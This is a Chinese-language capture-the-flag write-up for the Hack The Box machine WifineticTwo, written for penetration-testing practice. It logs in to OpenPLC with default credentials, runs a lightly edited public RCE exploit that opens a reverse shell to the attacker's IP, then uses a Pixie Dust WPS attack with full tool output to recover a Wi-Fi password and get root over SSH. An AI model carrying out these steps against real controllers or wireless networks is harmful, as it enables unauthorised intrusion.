靶机信息 | |
---|---|
系统 | Linux |
IP | / |
难度 | Medium |
状态 | Active/Reason 4 |
地址 | https://app.hackthebox.com/machines/WifineticTwo |
端口扫描
┌──(st4rry🚀Kali)-[/mnt/e/htb/WifineticTwo]
└─\ ✨ nmap -p22,8080 -sC -sV 10.129.41.69 -oN cv
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-17 11:42 CST
Nmap scan report for 10.129.41.69
Host is up (0.37s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.129.41.69:8080/login
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| content-type: text/html; charset=utf-8
| content-length: 232
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfZmzQ.6UlmCKjoB-AmIJgCDMG4x-79qp8; Expires=Sun, 17-Mar-2024 03:48:09 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Sun, 17 Mar 2024 03:43:09 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 302 FOUND
| content-type: text/html; charset=utf-8
| content-length: 219
| location: http://0.0.0.0:8080/login
| vary: Cookie
| set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfZmyQ.lbz2QfNjQTFuSkFuxKEO4gN1aLc; Expires=Sun, 17-Mar-2024 03:48:05 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Sun, 17 Mar 2024 03:43:05 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| content-type: text/html; charset=utf-8
| allow: HEAD, OPTIONS, GET
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfZmyg.JAsqwx-ljmh7zSKDzHAuU3cGS_k; Expires=Sun, 17-Mar-2024 03:48:06 GMT; HttpOnly; Path=/
| content-length: 0
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Sun, 17 Mar 2024 03:43:06 GMT
| RTSPRequest:
| HTTP/1.1 400 Bad request
| content-length: 90
| cache-control: no-cache
| content-type: text/html
| connection: close
| <html><body><h1>400 Bad request</h1>
| Your browser sent an invalid request.
|_ </body></html>
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.58 seconds
8080端口是一个web服务
目录扫描
啥也没有
GetShell
是一个OpenPLC
服务,需要登陆,使用Google搜索一下默认密码
默认账号和密码均为openplc
,成功登陆到后台
搜索历史漏洞进行尝试
找到一个需要认证的RCE
OpenPLC 3 - Remote Code Execution (Authenticated) - Python webapps Exploit (exploit-db.com)
需要对exp进行一个简单的修改
compile_program = options.url + '/compile-program?file=681871.st'
改为
compile_program = options.url + '/compile-program?file=blank_program.st'
执行python3 exploit.py -u http://target-uri:8080 -l openplc -p openplc -i 攻击机IP -r 4444
,并在攻击机上进行监听
即可成功反弹shell,在/root
目录下找到了user.txt
提权
此时GetShell的ip地址
root@attica01:/root# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 10.0.3.2 netmask 255.255.255.0 broadcast 10.0.3.255inet6 fe80::216:3eff:fefc:910c prefixlen 64 scopeid 0x20<link>ether 00:16:3e:fc:91:0c txqueuelen 1000 (Ethernet)RX packets 13324 bytes 1052258 (1.0 MB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 7876 bytes 2761702 (2.7 MB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536inet 127.0.0.1 netmask 255.0.0.0inet6 ::1 prefixlen 128 scopeid 0x10<host>loop txqueuelen 1000 (Local Loopback)RX packets 1070 bytes 62168 (62.1 KB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 1070 bytes 62168 (62.1 KB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)RX packets 0 bytes 0 (0.0 B)RX errors 0 dropped 0 overruns 0 frame 0TX packets 0 bytes 0 (0.0 B)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
可能是一个容器内,这有个wlan0的网络接口
使用OneShot进行Pixie Dust attack
# 显示可用网络并在指定网络上启动Pixie Dust攻击:
root@attica01:/tmp# ./oneshot -i wlan0 -K
[*] BSSID not specified (--bssid) — scanning for available networks
Network list:
# BSSID ESSID Sec. PWR WSC device name WSC model
1) 02:00:00:00:01:00 plcrouter WPA2 -30
# 对指定的BSSID启动Pixie Dust攻击:
sudo ./oneshot -i wlan0 -b 02:00:00:00:01:00 -K
[*] Running wpa_supplicant...
[*] Trying pin 12345670...
[*] Scanning...
[*] Authenticating...
[+] Authenticated
[*] Associating with AP...
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response...
[*] Received WPS Message M1
[P] E-Nonce: 34f7f76c988e19a4b4c2a43531a3d6b3
[*] Building Message M2
[P] PKR: 2c02dc64c7d76a2cd690cc5f756bf681c56d95d32fd8050df442bf6bab9c3081d3b5591393c269bc766845778fcf7cef214da8fb2ea04183848ea0abf8a88a120efb88211d99fe486ef3980f9081a954d225fcad9a84a490edb397b2e962693afef26329bf768afa0443e0a5e77c684d4cf873fe5eeacdb224444ee5046e9c5a5eceeb530fc71dd90c48df8dcbb1ae5acd306d678d9744327aa6c6e6b521aa04429fa068c28d09564ecc970cf7a4f2bed9c6a262a659bc7bad17e23bea0311f0
[P] PKE: 5fbc61dc00cfafcff6202605f0622f27f041576501be68f6432503de18b47c6d5ce823e4dcaaeddba54a93a63f3868fabdc712d264413e3caf9658b2aa53f70a0601bb628e4072ab7ae05819c2c022656312906ff288f305b1f38357c9090f372982732a0982a1252c031473931aa8e53f21f80d57c01fc6c23c043aeb5dd38347884a7f8460a3205dcbb9b378cb1b95a1f7a0ed95b6186bdbbec0dd4b9b6089814cb62d5b1afe4cce50f70c0ab7a409347bfae991c13cb73821fffb9ed498b3
[P] Authkey: 9478c8c582e0eeb502dd7db8bc8d73d3507155455235903aa0ae4965cc78d7ea
[*] Received WPS Message M3
[P] E-Hash1: ea8eed3fb6230878e95e38674aeb24d2177cd1ed5fa1dc31b946f18bf15cd65c
[P] E-Hash2: ac288fb434860d88d634b548a537ae9419800b96f1a4cab2f028c6faa28322a4
[*] Building Message M4
[*] Received WPS Message M5
[*] Building Message M6
[*] Received WPS Message M7
[+] WPS PIN: 12345670
[+] WPA PSK: NoWWEDoKnowWhaTisReal123!
[+] AP SSID: plcrouter
获取到了WIFI的creds:plcrouter:NoWWEDoKnowWhaTisReal123!
连接WIFI
配置文件/etc/wpa_supplicant/wpa_supplicant-wlan0.conf
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1network={ssid="plcrouter"psk="NoWWEDoKnowWhaTisReal123!"key_mgmt=WPA-PSKproto=WPA2pairwise=CCMP TKIPgroup=CCMP TKIPscan_ssid=1
}
配置文件/etc/systemd/network/25-wlan.network
[Match]
Name=wlan0[Network]
DHCP=ipv4
执行命令
systemctl enable wpa_supplicant@wlan0.service
systemctl restart systemd-networkd.service
systemctl restart wpa_supplicant@wlan0.service
查看wifi的ip addr
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.1.84 netmask 255.255.255.0 broadcast 192.168.1.255inet6 fe80::ff:fe00:200 prefixlen 64 scopeid 0x20<link>ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)RX packets 15 bytes 2780 (2.7 KB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 87 bytes 10794 (10.7 KB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
管理员的IP地址一般为第一个192.168.1.1
ssh root@192.168.1.1
获得root.txt